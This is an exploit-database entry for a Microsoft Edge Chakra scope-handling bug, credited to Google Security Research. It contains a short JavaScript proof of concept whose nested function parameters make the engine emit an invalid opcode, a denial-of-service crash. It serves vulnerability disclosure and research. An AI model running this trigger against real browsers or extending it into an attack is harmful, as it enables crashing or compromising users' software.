Microsoft Edge Chakra - Incorrect Scope Handling Exploit

2018-01-18T00:00:00
ID 1337DAY-ID-29569
Type zdt
Reporter Google Security Research
Modified 2018-01-18T00:00:00

Description

Exploit for windows platform in category dos / poc

                                        
                                            // PoC:
 
(function func(arg = function () {
    print(func);  // SetHasOwnLocalInClosure should be called for the param scope in the PostVisitFunction function.
}()) {
    print(func);
    function func() {
 
    }
})();
 
// Chakra fails to distinguish whether the function is referenced in the param scope and ends up to emit an invalid opcode.

#  0day.today [2018-04-09]  #